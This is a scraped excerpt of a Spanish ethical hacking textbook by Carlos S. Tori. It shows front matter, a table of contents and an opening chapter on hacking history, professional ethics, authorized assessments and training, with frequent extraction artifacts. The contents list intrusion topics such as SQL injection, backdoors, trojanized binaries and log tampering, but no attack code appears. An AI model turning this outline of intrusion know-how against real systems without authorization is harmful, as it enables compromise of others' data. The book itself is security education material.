Hacking Etico - [PDF Document] (2024)

Hacking Etico - [PDF Document] (1)

Hacking Etico - [PDF Document] (2)

Hacking Etico - [PDF Document] (3)

Hacking Etico - [PDF Document] (4)

HHHHAAAACCCCKKKKIIIINNNNGGGGÉÉÉÉttttiiiiccccoooo

Hacking Etico - [PDF Document] (5)

Carlos S. Tori

Nació y creció en Rosario, Argentina. Es Analista de sistemas de información, Técnico superior en organización y métodos, y sistemas de computación. Actualmente cursa el último año deIngeniería en Sistemas. Prestó servicios como consultor en seguridad a Hynet S.A, Argeniss/IOActive Inc., I-SEC Global Inc.llevando a cabo proyectos para sus clientes, de modo

remoto e interno, tanto en organizaciones privadas como gubernamentales. También se desempeñó como analista y administrador freelance en varias empresaslocales. Fue encargado de Seguridad Informática en VoipGroup Inc. analizandoservidores remotos, coordinando administradores y redactando políticasrelacionadas a seguridad informática. Tuvo su primer contacto con la seguridadinformática a mediados de los años 90 vía hyperterminal en las BBS, antes deconectarse a Internet. Su primer ordenador fue un Czerweny CZ 1500, regalado para el día del niño.

Contacto (Participacion en proyectos, feedback de lectores):[emailprotected] O a la casilla asociada a este PGP ID: 0x7F81D818

Dedicatoria:

A mi familia, a mi novia. Apoyo incondicional.

Agradecimientos a:

Diego Coppari, Sebastian Grignoli, Cesar Cerrudo, Diego Krahenbuhl, MarceloSoffredi, Marcelo Fernandez, Eduardo Cardone, Diego Maggio, Jonathan Sarba,Martín Vila, Christian Vila, Enrique Espejo Cabrera, Román Medina-HeiglHernández, Martín González Parra, Ulises Cuñé, profesores de la universidad UAI,Leonardo Pigñer, Iván Arce, Ariel Testa, Santiago Cavanna, Adolfo Fioranelli,Ricardo Goldberger, Juan Echeverría, Leandro Constantino, Pablo Tossi, IsmaelBriasco, Alejandro Cordobés, staff del instituto ISEI, Juan Grimandella, FabiánDamici, Andrea, Ricardo Cedaro, Pablo Blanch, Nidia Singh, Carlos Contesti,Vanina Muchnik, Carlos Robledo, Florencia Felgueroso, y Floreal Otegui.

Hacking Etico - [PDF Document] (6)

PrólogoSiempre en las noticias escucharemos terribles cosas sobre virus y ataques llevadosa cabo por los hackers. Los medios sensacionalistas se han encargado en darle un mal significado a lapalabra hacker, un significado que equipara a los hackers con criminales. Un hacker puede ser bueno o malo al igual que un abogado, un médico, unprofesor o el oficio que fuera. El termino ethical hacking o hacking ético nace por tal motivo, era necesarioaclarar que no es un hacking malo sino bueno, ético, pero en definitiva es hacking.

Basándose en su experiencia y conocimiento del tema, Carlos nos brinda esta obra,que ayudará a adentrarlos en el mundo del hacking ético presentando losconceptos básicos más importantes en forma clara y eficiente, así como tambien,los orientará en como profundizar más sus conocimientos. Si estás interesado en aprender sobre seguridad informática y hacking ético, estaobra será entonces un excelente punto de partida en tu viaje a este apasionantemundo.

Cesar Cerrudo. Fundador y CEO de Argeniss.www.argeniss.com

*El Sr. Cerrudo ha sido expositor en congresos de seguridad tales como:Microsoft, Black Hat, Bellua, CanSecWest, EuSecWest, WebSec,HITBSecConf, entre otros. Ha descubierto vulnerabilidades críticas en Windowsserver 2008, Vista y otros productos de Microsoft, Oracle, Yahoo, IBM y en unsin fin de aplicaciones. Es el investigador en seguridad informática local con más proyección internacionalque ha habido en estos ultimos años. Miembro de WASC (Web Application Security Consortium).

Hacking Etico - [PDF Document] (7)

Contenido

HHaacckkiinngg ÉÉttiiccoo Introducción (15)Formación del profesional (16)Organizaciones formales (37)Network security assessment (41)

Un repaso por las características de las organizaciones, la historia del ethicalhacking. las fuentes de estudio para la formación de un profesional y las nocio-nes de un chequeo de seguridad median-te pautas legales.

RReeccaabbaarr IInnffoorrmmaacciióónnIntro a information gathering (46)Consultas a bases de datos (48) Buscadores: google hacking (52)Otros recursos online (57)Cabeceras de mails (60)Escaneo de puertos y fingerprinting (63)Telneteo: busqueda a mano (70)Peticiones http (74) Datos dentro de archivos (76)Information gathering en vida real (78)Modulo de IG de Backtrack (79)Analizando la información (82)

Aquí se detallarán las maneras que tieneel profesional y su contraparte (el intru-so) para recabar información previa al ataque para finalmente definir una estra-tegia de embate. Búsqueda pasiva, intru-siva, de la vida real, a mano o bien de modo automatizado via red o internet.

4

IInnggeenniieerrííaa SSoocciiaallIntro a la Ingenieria Social (86)IS +information gathering (93)Ejemplos (95)Medidas contra el engaño (104)

En este capítulo se detallarán ejemplosde la técnica sobre el factor humano delsistema de información, relacionadas alengaño, fisico o a través de medios digi- tales.

IInnttrroodduucccciióónn aa FFuueerrzzaa BBrruuttaaEmpleos y orientación de la FB (108)Ejemplos didácticos (109)Factores que inciden en el tiempo (123)Rainbow Tables (128)Diccionario (130)

Sección dedicada a las características dela fuerza bruta como técnica de descubrira la fuerza, un dato (como ser un pass-word) o una manera de dar con una solu-cion de una manera no muy elegante.

AApplliiccaacciióónneess WWeebbDirectorios y archivos ocultos (135)Ingenieria inversa sobre flash (140)XSS o cross site scripting (145)Cuentas de correo en 15 formas (154)Ejecución remota de comandos (154)Inclusión de archivos (154)Programación insegura = Exploits (156)

Este capítulo hace referencia a instancias

Capítulo 1

Capítulo 3

Capítulo 4

Capítulo 5

Capítulo 2

Hacking Etico - [PDF Document] (8)

5

dadas en pagínas Webs, aplicaciones o descuidos de administración existentes en ella y en determinados contextos.Se hace una leve referencia (mas bien ennumeración de 15 técnicas) a formas de comprometer casillas de correoelectrónico como tambien, las medidas correctivas.

IInnyyeecccciióónn ddee ccóóddiiggoo SSQQLLIntroducción (164)Ejemplo de Bypass de acceso (166)Historia de SQL Injection (171)Metodología (172)Evasión de reglas (175) Herramientas automatizadas (179)Caso real de hacking etico (183)

En este apartado, se ennumeran algunoscasos de inyección de código SQL enaplicaciones, herramientas automatizadasy un claro ejemplo paso a paso de co-mo se logró el acceso a un panel de ad-ministración ejecutivo.

SSeerrvviiddoorreess WWiinnddoowwssIntroduccion (190)Comprometiendo un servidor (191)Null Session sobre Netbios (196)Comandos NET (202)Herramientas recomendadas (205)Acciones del intruso (212)Elevacion de privilegios (212)Busqueda de información (215) Analisis (215)Captura de paquetes (216)

Capítulo 6

Capítulo 7

Instalación de backdoors (217)Troyanos (220) Borrado de rastros (222)Propagarse a la red interna (227)

En este capítulo veremos técnicas usua-les para comprometer servidores Win-dows, de modo automatizado y manual.Lo más interesante son las acciones delposible intruso dentro del servidor concada uno de los puntos definidos en de-talle y ejemplos.Para conocer, se muestran algunos deta-lles realizados en su contraparte Linux.

SSeerrvviiddoorreess LLiinnuuxxIntroducción (232)Nessus en Debian GNU/Linux (233)Acciones del intruso (236)Dentro de la shell (238)Dsniff (246)Troyanizar binarios de sistema (251)Instalando un backdoor/rootkit (256)Manipulando logs (259)Hardening a nivel kernel (266)Hardening de servicios (282)5 Preguntas a un exploit writer (284)

Como el titulo aclara, este capítulo serádedicado a lo referente en la plataformaLinux, un repaso breve por las acciones delintruso dentro de este, las herramientas ylas técnicas más utilizadas. Tambien sedescribe paso a paso como como se ase-gura el servidor (hardening) tanto a nivelnucleo como de servicios y se recomiendanlas mejores plataformas de trabajo parachequeo. Para finalizar, 5 preguntas a un desarrollador de exploits.

Capítulo 8

Hacking Etico - [PDF Document] (9)

6

AAllgguunnooss CCoonncceeppttooss FFiinnaalleessHacking local o físico (290)Errores mas comunes cometidos (302)Técnicas avanzadas (310)Metodologías y Normativas (312)

En el último capítulo se aclaran algunosconceptos basados en experiencia del autor, acerca de los los errores mascomunes cometidos por los que se inicianen la seguridad de modo formal, carac- terísticas de un hacking físico a un sis-tema, descripción de técnicas avanzadasque quedaron fuera del libro, y por últimolas normativas actuales sobre: chequeos, seguridad de la información, buenasprácticas, optimización de sistemas en Gral.

Como instalar una plataforma de trabajo/testeo multisistema paso a paso: FFrreeeeBBSSDD,, DDeebbiiaann GGNNUU//LLiinnuuxxyy WWiinnddoowwss XXPP ccoonnvviivviieennddoo eenn eell mmiissmmoo ddiissccoo.. (317-328)

Aquí se detalla paso a paso la instalaciónde tres sistemas operativos de maneramuy clara, tambien se cuenta el porqueconviene utilizarlos y en que tipo de tra-bajo nos beneficiará.

Bonus Track

Capítulo 9

Hacking Etico - [PDF Document] (10)

7

Introducción¿Por dónde comienzo? Esa es, quizás, la pregunta más habitual que se hace todoaquel interesado en ingresar al universo heterogéneo que contempla la seguridad delos sistemas y sus activos. No es de extrañarse que esto sea así si tenemos en cuentaque hay demasiado material y que no hay una correcta plataforma o programaactual de educación formal sobre el tema.Como si eso fuera poco, esto sucede en un momento de la historia en el que existeun auge de organizaciones altamente informatizadas en el que no hay dos iguales yen el que todas son bastante desorganizadas. Éstas utilizan Internet como recursode comunicación para hacer movimientos constantes de información institucionalpero apenas están tomando conciencia de la seguridad de la información y del altovalor que tiene ésta hoy en día.

En las páginas de este libro intentaré ser lo más claro posible en los conceptos y enel desarrollo, a través de palabras y definiciones sencillas. No sólo para que seallevadera e interesante la lectura sino también para que desde un principianteestudiante de sistemas o ejecutivo interesado, hasta el técnico sin demasiadaexperiencia, descubran y aprendan acerca de este tema desde el principio y enforma ordenada. Por eso, cuando sea conveniente extender la explicación o eldesarrollo de algún punto que no sea central, daré a conocer algún documento,recurso online o sitio web para su consulta.La temática está basada en la descripción detallada de las técnicas básicas y usualesde ethical hacking, más precisamente de un Network Security Assessment externo(comprobación de seguridad en red cuyo contenido no está alineado a ningunacertificación, metodología o curso de ese estilo). También habrá introduccionesteóricas sobre aspectos del ethical hacking, notas relacionadas a la formación idealde un profesional de la seguridad, gestión de organizaciones formales y lautilización de herramientas y metodologías, entre otras cosas. Además, se veránconceptos propios acerca de los escenarios personales o la importancia de generarerrores en un chequeo, como también recomendaciones de muchos otros recursosserios en cuanto a material de estudio.

En estas páginas que no se entrará en detalles sobre cómo explotar algunasvulnerabilidades que existen hoy en día porque éstas probablemente seránsolucionadas muy pronto, y de ese modo el libro o gran parte de él, se tornaríaobsoleto. Esto se debe a que un grupo de profesionales tarda mucho menos enprogramar la solución o en redactar un excelente whitepaper (documento) sobreello que lo que tarda la imprenta en imprimir esta edición. Como esto haría que leer este libro diera la misma sensación que leer un periódico viejo, es preferible

Hacking Etico - [PDF Document] (11)

concentrarse en dónde ir a buscar esa información para obtenerla a diario y asíhacer que la teoría que aquí se expone sea útil en mayor porcentaje y por mástiempo. Esto será aplicable a la mayoría de los casos de ethical hacking o deseguridad informática (y de la información) con los que nos podamos encontrar ynos permitirá estar informados de modo correcto a través de canales eficientes.El fin de este libro es comunicar conocimiento significativo sobre la materia,apuntando a aquellos que desean iniciarse o descubrir nuevos puntos de vista.Espero que lo disfrute.

Carlos Tori.

8

Hacking Etico - [PDF Document] (12)

1 > Elhacking

ético.Referencias históricas de sucesos y de

evolución en la materia. Cómo se comenzó

a implementar el hacking ético, por

quiénes y sus características; en dónde

y de qué modo actúan o se forman estos

profesionales. También conoceremos

material sobre aspectos importantes de

las organizaciones y las definiciones

básicas de los componentes involucrados.

Hacking Etico - [PDF Document] (13)

UN POCO DE HISTORIASi tu intención es describir la verdad, hazlo con sencillez y la elegan-cia déjasela al sastre.

Albert Einstein.

Hace algún tiempo, cuando algunas de las organizaciones apenas comenzaban a in-crementar los procesos informatizados dentro de su sistema de información, suspropios administradores y analistas técnicos eran los encargados de buscar clarasfalencias o brechas de seguridad en el escenario para solucionarlas como podían.En ese entonces, la mayoría no tenía una noción madura acerca de la seguridad dela información o de las intrusiones de terceros no autorizados en sus sistemas. Amedida que pasó el tiempo, estas organizaciones se multiplicaron de manera nota-ble y se informatizaron aún más, incluso tomando a Internet como plataforma desus movimientos de información. De ese modo, se hicieron fluidas las comunica-ciones interpersonales, intersucursales, transacciones o flujo digital de todo tipoy nivel de importancia, dejando, al mismo tiempo, muchos más datos expuestos aterceros, como nunca antes había sucedido.

Hackers. Matthew Broderick y su compañera de reparto en War Games (1983).El público en general conoce así a los hackers.

Como resultado de ello y debido a que grandes casos de intrusión se dieron a co-nocer al público en general a través de los medios de prensa (aunque muchos no

10

Hacking Etico - [PDF Document] (14)

salen a la luz para salvaguardar una ima-gen institucional de organización confia-ble), se hizo evidente la falta de algún ser-vicio profesional que imitara esos ataqueso capacitara a su personal con las mismasmetodologías que utilizaba el intruso. Deesa manera, se podían evaluar las realescondiciones de seguridad en las que seencontraba una organización y, de existiragujeros en el sistema o potenciales bre-chas, descubrirlos y solucionarlos de for-ma preventiva.Los accesos no autorizados, junto a unagama de vulnerabilidades y todo tipo deamenazas relacionadas o dirigidas haciala información, estaban a la orden deldía. Desde algunos años antes, muchosespecialistas ligados a la seguridad infor-mática venían estudiando y practicandometodologías de intrusión en sus trabajos, laboratorios o casas. Así, comenzaron abrindar a las organizaciones un servicio a modo de proveedores externos o contra-tados y, para darle un nombre medianamente formal, lo llamaron ethical hacking.Este concepto incluye las denominaciones vulnerability scanning y penetrationtest, mejor denominado network security assessment.Había una clara demanda de seguridad y, donde existe demanda, aparece una ofer-ta. Por lo tanto, allí mismo nace un mercado. Apenas mediaban los años 90, ya aso-maban las épocas de e-commerce, comenzaba la integración de las pequeñas y me-dianas empresas de todo el mundo a la red (e-organizaciones), a la que poco a po-co se sumaba el público en general. Aparecía malware más sofisticado, se publica-ban novedosas técnicas de intrusión o explotación de vulnerabilidades y no habíademasiada conciencia sobre la administración segura de los servidores.Al mismo tiempo, jóvenes de todo el mundo se colaban en Internet engañando las

11

Chacal. Actualmente, Kevin Mitnick es unempresario relacionado a la seguridad de lainformación y autor de dos interesantes libros.

Con este nombre, se conoce todo aquello que se cataloga como código malicioso (pro-gramas). Generalmente, estas amenazas son detectadas por los antivirus, se trate degusanos o worms, spyware, troyanos, virus o scripts malintencionados (en rutina detiempo o de ejecución).

Malware

Hacking Etico - [PDF Document] (15)

centrales telefónicas (por una cuestión de gastos) de sus países para divertirse conlos sistemas informáticos e intercambiar conocimientos con sus pares del otro la-do del globo. De ese grupo de gente, saldría lo que en esos días serían algunos delos mejores profesionales de la seguridad, así como también hháábbiilleess iinnttrruussooss..Es te fe nó me no pu do ser po si ble gra cias a la au sen cia de una pla ta for ma edu ca ti vafor mal so bre el te ma, ya que los re cur sos de apren di za je eran, y a me nu do son (hoymás que nun ca), com par ti dos. En aquel en ton ces, so bre se gu ri dad no ha bía edu ca -ción for mal más allá de un post gra do en al gu na uni ver si dad de EE.UU. o la que ofre -cie ra una ins ti tu ción pri va da pa ra sus em plea dos. En un ám bi to más in for mal, re ciénen el año 1993, na ció Bug traq, una co no ci da lis ta de co rreo en la que se tra tan te masde se gu ri dad. No fue to do de un día pa ra el otro, pe ro tu vo una mar ca da evo lu ción.

Securityfocus. La me jor de fi ni ción de Bug traq(ac tual men te alo ja da en www .se cu rity fo cus .com)

se en cuen tra en Wi ki pe dia, ya que in clu ye su his to ria com ple ta.

12

O xploit, es un pro gra ma de prue ba de con cep to que pue de es tar en có di go fuen te pa racom pi lar (fuen te.c) o formato bi na rio ti po .exe. Sir ve pa ra apro ve char o de mos trar unavul ne ra bi li dad en una apli ca ción y pue de estar escrita en va rios len gua jes de pro gra ma -ción. En se cu rity vulns .co m/ex ploits, en con tra mos un re po si to rio de Proof of con cept.

Ex ploit

Hacking Etico - [PDF Document] (16)

AAÑÑOO SSUU CCEE SSOO

1982 John Shoch (uno de los crea do res de et her net), jun to a un co le ga, es cri bie ron el pri mer re por te so bre un gu sa no (worm), to man do ese nom bre de una no ve la de cien cia fic ción de 1975 en la que, ba jo el nom bre Ta pe worms, des cri bían a pro gra mas au tó ma tas que via ja ban por las re des trans por tan do in for ma ción.

1983 Ese año se es tre nó la fa mo sa pe lí cu la War Ga mes, en la que el ac tor Matt hew Bro de rick in ter pre ta ba a un chi co que in gre sa ba en una ba se mi li tar a tra vés de su com pu ta do ra y ca si de sa ta una gue rra nu clear.

1984 Se crea ron la pu bli ca ción 2600, el CCC chaos com pu ter club, Le gion of doom y la di vi sión de frau de con tar je tas y com pu ta do ras del Ser vi cio Se cre to.

1988 Ro bert Tap pan Mo rris sol tó un gu sa no en Ar pa net (co mo se lla ma ba In ter net an te s) y de ese modo in fec tó mi les de ser vi do res Unix. Fue en jui cia do y con de na do a cum plir 400 ho ras de tra ba jo so cial.

1992 Ke vin Mit nick, lue go de es tar pró fu go y ser atra pa do por el FBI, fue sen ten cia do por ro bo de soft wa re e in tru sio nes en or ga ni za cio nes.

1994 Vla di mir Le vin ro bó, des de San Pe ters bur go, a tra vés de los sis te mas de Ci ti bank, más de 10 mi llo nes de dó la res por me dio de trans fe ren cias a sus cuen tas. En los dos años si guien tes, des de otros ban cos de los Es ta dos Uni dos, 300 mi llo nes de dó la res se mo vi li za ban elec tró ni ca men te de mo do frau du len to.

Sucesos. Al gu nos he chos im por tan tes de la his to ria del hac king.

¿POR QUÉ ÉTI CO?Pa ra emu lar la me to do lo gía de ata que de un in tru so in for má ti co y no ser lo, tie neque ha ber éti ca de por me dio, más allá de to das las con di cio nes, tér mi nos y ac ti vosque ha ya al re de dor del ca so. Ima gi ne mos que las au to ri da des de un ban co con tra tana al guien pa ra que si mu le un ro bo (no a ma no ar ma da, cla ro es tá) y de ese mo do seprue be la efi cien cia de su sis te ma de se gu ri dad. Es te su pues to la drón pro fe sio nal, lue -go de lo grar su co me ti do, in for ma a sus due ños en de ta lle có mo pu do ha cer lo y có -mo ellos de be rían me jo rar su sis te ma de se gu ri dad pa ra que no vol vie ra a pa sar. Ló -gi ca men te, no se pue de en car gar de ha cer es to una per so na sin éti ca, al guien in mo -ral. No en tra re mos en el te rre no de lo éti co co mo ra ma den tro de la fi lo so fía prác -ti ca ni re dac ta re mos un tra ta do so bre deon to lo gía pro fe sio nal, no só lo por la cues -tión de es pa cio, si no tam bién por res pe to a los grie gos. Sí, en cam bio, di re mos quela éti ca im pli ca que el tra ba jo y la in ter ven ción del pro fe sio nal en se gu ri dad in for -má ti ca o de la in for ma ción no com pro me ten de nin gún mo do los ac ti vos de la or -ga ni za ción, que son los va lio sos da tos con los que ella cuen ta.

13

Hacking Etico - [PDF Document] (17)

Es tos da ños po drían ser he chos de va rias ma ne ras: al te ra ción, mo di fi can do a con -cien cia re gis tros o da tos sen si bles; bo rra do, des tru yen do in for ma ción, ba ses de da -tos o so bres cri bien do al gún ti po de da to; dar a co no cer in for ma ción a ter ce ros,in cum plien do las nor mas de con fi den cia li dad; sus trac ción, ro ban do o guar dan doda tos en me dios de al ma ce na mien to ex ter nos. To do es to, ya sea en la bús que da deries gos me dian te un se cu rity as sess ment o com pro ba ción de se gu ri dad, co mo tam biénen la di vul ga ción de lo que se vio, ha bló, es cu chó o ma ni pu ló en el trans cur so, en lapla ni fi ca ción o en el de sa rro llo de la ta rea mis ma y en su aná li sis fi nal. Más allá de la éti -ca pro pia de ca da pro fe sio nal, exis ten con duc tas mí ni mas que és te de be cum plir:• Ha cer su tra ba jo de la me jor ma ne ra po si ble.• Dar el me jor re por te.• Acor dar un pre cio jus to.• Res pe tar el se cre to.• No ha blar mal ni in cul par a un ad mi nis tra dor o equi po de pro gra ma do res.• No acep tar so bor nos.• No ma ni pu lar o al te rar re sul ta dos o aná li sis.• De le gar ta reas es pe cí fi cas en al guien más ca pa ci ta do.• No pro me ter al go im po si ble de cum plir.• Ser res pon sa ble en su rol y fun ción.• Ma ne jar los re cur sos de mo do efi cien te.

En nues tros tiem pos, pa ra la ma yo ría de la gen te y de la pren sa, la pa la bra hac kinges tá li ga da a de lin cuen tes co mu nes, a per so nas de du do sa mo ra li dad que uti li zan co -no ci mien tos de in for má ti ca o elec tró ni ca pa ra de lin quir. Por tal mo ti vo, en el trans -cur so de es te li bro, só lo ci ta re mos co mo per so na jes a dos fi gu ras: al pro fe sio nal éti -co y a su opues to, el in tru so, pa ra que no ha ya ma len ten di dos de nin gún ti po.

Inversa. Portal sobre ingenieria inversa: video.reverse-engineering.net

14

Hacking Etico - [PDF Document] (18)

Ejem plo de et hi cal hac king

Pa ra com pren der me jor el con cep to de hac king éti co, ana li ce mos un ca so. ¿Es éti -co in gre sar en una ca si lla de co rreo elec tró ni co aje na sin co no cer su pass word? Ba -jo las po si bi li da des que brin da el et hi cal hac king, por su pues to. Esa si tua ción pue -de dar se siem pre y cuan do la ca si lla de e-mail sea de al guien que nos ha ya au to ri -za do, co mo pro fe sio nal éti co, a de mos trar le que su or ga ni za ción es vul ne ra ble. Co -mo una ca si lla es per so nal (qui zás de un ge ren te o de un ad mi nis tra dor de sis te -mas), po si ble men te ese in gre so nos lle ve a ob te ner ac ce so a de ter mi na do lu gar o ada tos sen si bles. És tos, a su vez, se rán uti li za dos pa ra lo grar en trar en un ser vi dor yde allí di ri gir nos ha cia la red in ter na, con to do el ries go que sig ni fi ca pa ra una or -ga ni za ción for mal al ta men te in for ma ti za da. De ese mo do, des cu bri re mos pe que -ños des cui dos que, des de un lu gar im pen sa do, pue den ex po ner a la em pre sa porcom ple to. Sin em bar go, es ta vez, ese ries go pa sa ría rá pi do a la his to ria, ya que es -ta mos ha blan do de un tí pi co ca so de et hi cal hac king, en don de el pro ble ma es in -ten sa men te bus ca do, des cu bier to, ana li za do, re por ta do y por úl ti mo so lu cio na do ala bre ve dad.Pa ra lo grar al go así, se re quie ren dos ele men tos bá si cos: en prin ci pio, me to do lo gíapa ra pro ce der. Es to es el re sul ta do de un gru po de pie zas pre via men te en sam bla -das: ha bi li da des per so na les de ló gi ca y crea ti vi dad, téc ni cas pro pias de un net workse cu rity as sess ment, re co no ci mien to o re le va mien to de to dos los com po nen tes deles ce na rio y he rra mien tas co mo un in tér pre te de co man dos del ti po prompt o shell,un web brow ser y un edi tor de tex to, al me nos pa ra es te ca so.Por otro la do, se re quie re au to ri za ción, que es el ele men to más im por tan te. Es taau to ri za ción tam bién tie ne sus par tes: un con tra to de con fi den cia li dad, coor di na -ción, eva lua ción, pro ce sos por se guir y to das las ca rac te rís ti cas in ter nas (por ejem -plo, el com pro mi so de la ge ren cia pa ra con el pro yec to es vi tal) o pro pias de laspar tes in vo lu cra das en es te tra ba jo /de sa fío. Pa ra re su mir, vea mos el pro ce so de et hi cal hac king en po cas pa la bras:

1. La or ga ni za ción de sea sa ber si sus sis te mas son real men te se gu ros.

15

Es muy in te re san te el tex to Éti ca em pre sa rial, teo ría y ca sos, del au tor Ra fael Gó mezPé rez. Y pa ra co no cer más so bre el as pec to éti co del hac king li ga do a la se gu ri dad dela in for ma ción, es re co men da ble el li bro La éti ca del hac ker y el es pí ri tu de la era dela in for ma ción, del au tor Pek ka Hi ma nen, con pró lo go de Li nus Tor valds.

Lec tu ra so bre éti ca

Hacking Etico - [PDF Document] (19)

2. Se lec cio na y con tra ta un ser vi cio pro fe sio nal de et hi cal hac king.3. Lo au to ri za a rea li zar el tra ba jo me dian te di ver sas pau tas.4. Pla ni fi can es tra té gi ca men te có mo se rea li za rá y el al can ce que ten drá.5. El pro fe sio nal, lue go de lle var a ca bo los aná li sis pre li mi na res, rea li za su ta reaimi tan do al ata can te real, pe ro sin com pro me ter da to al gu no.

6. Lue go, ana li za los re sul ta dos del se cu rity as sess ment.7. Con fec cio na un re por te de ta lla do pa ra que la or ga ni za ción lo eva lúe.8. So lu cio na lo vul ne ra ble o mi ti ga lo po ten cial pa ra de jar el sis te ma más se gu ro.Se rea fir ma la de fen sa del sis te ma en ge ne ral.

9. Se adop tan po lí ti cas de con trol y se gui mien to (nor ma ti va).

Et hi cal hac king es una me to do lo gía uti li za da pa ra si mu lar un ata -que ma li cio so sin cau sar da ño.

E-coun cil – CEH v5.0

Formación del ProfesionalKnowledge is power.

Sir Francis Bacon.

Una anéc do ta co no ci da (que da ta de la épo ca de las BBS, Bu lle tin Board Sys tem, allápor los años 90) des cri bía có mo dos jó ve nes in gre sa ron en los sis te mas de un la bo -ra to rio es pa cial. És tos lo lo gra ron lue go de ha ber in ten ta do mu chas con tra se ñas en -tre las cua les ha bía nom bres de cons te la cio nes, co me tas y pla ne tas. Fi nal men te, acer -ta ron con un usua rio de sis te ma que te nía, co mo cla ve, el nom bre de una le ja na es -tre lla. El pro fe sio nal de se gu ri dad, al lle var a ca bo un net work se cu rity as sess mentco mo par te de su tra ba jo de et hi cal hac king, ne ce si ta con tar con ese ti po de ló gi cay tie ne que apli car la, más allá de uti li zar las téc ni cas y he rra mien tas (open sour ce, co -mer cia les o pri va das), da do que ne ce si ta imi tar un ata que de la me jor ma ne ra y conel má xi mo ni vel po si ble. Pa ra eso, ten drá que em plear to dos los re cur sos de in te li -gen cia que ten ga a su al can ce, uti li zar al ex tre mo sus co no ci mien tos, po der de de -duc ción y aná li sis me dian te el ra zo na mien to y así de ter mi nar qué es lo me jor quepue de in ten tar, có mo, dón de y con qué. Por ejem plo, sa ber si un pe que ño da to, pormás chi co o in sig ni fi can te que pa rez ca, le se rá útil y có mo pro se guir gra cias a él. Con ti nua men te de be rá en fren tar se a eta pas que le de man den la ma yo ría de es tas ap -ti tu des:

• Sa ber có mo de fi nir pa tro nes de con duc ta y ac ción.• Ha cer re le va mien tos pa si vos de in for ma ción.• In ter pre tar y ge ne rar có di go, ci fra do y en tro pías de da tos.

16

Hacking Etico - [PDF Document] (20)

• Des cu brir ma nual men te des cui dos en el ob je ti vo.• Descubrir vul ne ra bi li da des pre sen tes de to do el es ce na rio téc ni co.• Bus car ló gi ca e iló gi ca men te.• Pro yec tar se so bre la mar cha en mo do abs trac to, tác ti ca y es tra té gi ca men te.• Ser ex haus ti vo, pe ro a la vez sa ber cuán do es el momento de re cu rrir a la dis ten -sión (pa ra no ago tar la men te).

• Ser éti co por so bre to das las co sas.

Si es tas con di cio nes per so na les y cul tu ra les del pro fe sio nal no son las ade cua das(por te ner po co in ge nio, po ca cul tu ra ge ne ral o ima gi na ción que im pi da eje cu tar -las), és te no se rá efi cien te en su tra ba jo. No ten drá el va lor agre ga do de quien vamás allá de las me to do lo gías que se pue den in ter pre tar si guien do un sim ple chec -klist o un de ter mi na do ma nual de pro ce di mien to.Una ca ren cia en al gu no de es tos as pec tos po dría sig ni fi car el no des cu brir una bre -cha po ten cial de se gu ri dad ape nas per cep ti ble pre sen te en el sis te ma o que, a fu tu -ro, un ata can te real más in te li gen te y ex pe ri men ta do sí lo ha ga.Na die di jo que es to era fá cil. Pa ra ha cer un che queo de se gu ri dad en un en tor no,no bas ta con só lo co lo car a tra ba jar un scan ner (bus ca dor) de vul ne ra bi li da des so -bre una di rec ción IP y sen tar nos a es pe rar su re sul ta do.

Retina. Pantalla del buscador de vulnerabilidades Retina, de la empresa Eeye .

Un co le ga, de nom bre Cle ment Du puis, lue go de dis cu tir uno de los as pec tos de laedu ca ción so bre se gu ri dad en la lis ta Bug traq, hi zo el si guien te co men ta rio: Ne ce -

17

Hacking Etico - [PDF Document] (21)

si ta mos gen te téc ni ca, ne ce si ta mos gen te que mi re to do el es ce na rio, ne ce -si ta mos gen te con ha bi li da des so cia les, ne ce si ta mos gen te sin ha bi li da desso cia les, pe ro con mu cha ló gi ca. Es to da una pe que ña idea acer ca de los per fi lesy ca rac te rís ti cas que se ne ce si tan tan to pa ra la par te téc ni ca co mo pa ra la ges tión, laco mu ni ca ción y la re so lu ción de pro ble mas ló gi cos. Lle gar a ser un pro fe sio nal muybue no, que pue da ma ne jar se có mo da men te en to dos o en gran par te de los per fi les,pue de re que rir va rios años de es tu dio, prác ti ca y tra ba jo. Son tan tas las va ria bles ycom po nen tes tec no ló gi cos in vo lu cra dos (ade más de la ne ce si dad de man te ner secons tan te men te in for ma dos), que es im po si ble co no cer los, en ten der los y apli car losde un mo do efi cien te de un día pa ra otro.

OSI. Es im por tan te co no cer pro to co losde co mu ni ca ción. En es te ca so, el mo de lo OSI.

Los com po nen tes que apa re cen a con ti nua ción son una gran par te del as pec to téc -ni co que hay que co no cer y es tu diar, sin te ner en cuen ta to do aque llo que com pren -de el ma ne jo de po lí ti cas y nor ma ti vas en el as pec to se gu ri dad y or ga ni za ción (ges -tión), su ma do a las cues tio nes de ori gen per so nal o la capacidad de lle var ade lan tegru pos y pro yec tos. Idio mas, sis te mas ope ra ti vos, hard wa re, mal wa re, co man dos,net wor king y to po lo gías, au di to rías, len gua jes de pro gra ma ción, ci fra dos, aná -li sis de re sul ta dos, co nec to res, vul ne ra bi li da des, he rra mien tas, téc ni cas de in tru -

18

Hacking Etico - [PDF Document] (22)

sión, IDS, da ta ba ses, di se ño ló gi co, apli ca cio nes, re le va mien tos y pro to co los deco mu ni ca ción (fa mi lia TC P/IP en tre otros).El ma te rial es tan vas to que po dría alie nar a un ser hu ma no si es te no lo asi mi la racon cau te la, y por ello es muy im por tan te no li diar con ma te rial inú til y te ner bienpre sen tes las fuen tes co rrec tas de es tu dio o prác ti ca. Tra tar de ver a la vez un po -co de to do es una pér di da de tiem po, que es lo más va lio so que te ne mos. Por esemo ti vo, hay que dar se cuen ta y tra tar de des cu brir las ap ti tu des y ha bi li da des(skills) de ca da uno, cul ti var se de for ma ade cua da y prac ti car o tra ba jar en ba se aello.La for ma ción pue de orien tar se a me di da que el pro fe sio nal o es tu dian te de ci da ha -cia qué la do de sea in cli nar se en la ma te ria, ya que no es lo mis mo ser un de sa rro -lla dor de ex ploits en C++ que re dac tar po lí ti cas de ac ce so fí si co en re cin tos o con -fi gu rar, de mo do se gu ro, un ser vi dor Li nux.Si bien no se pue de ser un ex per to en to do, lo más re co men da ble es que, lue go dedo mi nar bien un per fil, se co mien ce a es tu diar los com po nen tes de otro. Su ma doa eso, hay que man te ner se bien in for ma do so bre las vul ne ra bi li da des ac tua les, lasme to do lo gías, los re cur sos de ase gu ra mien to y las me di das de pre ven ción.

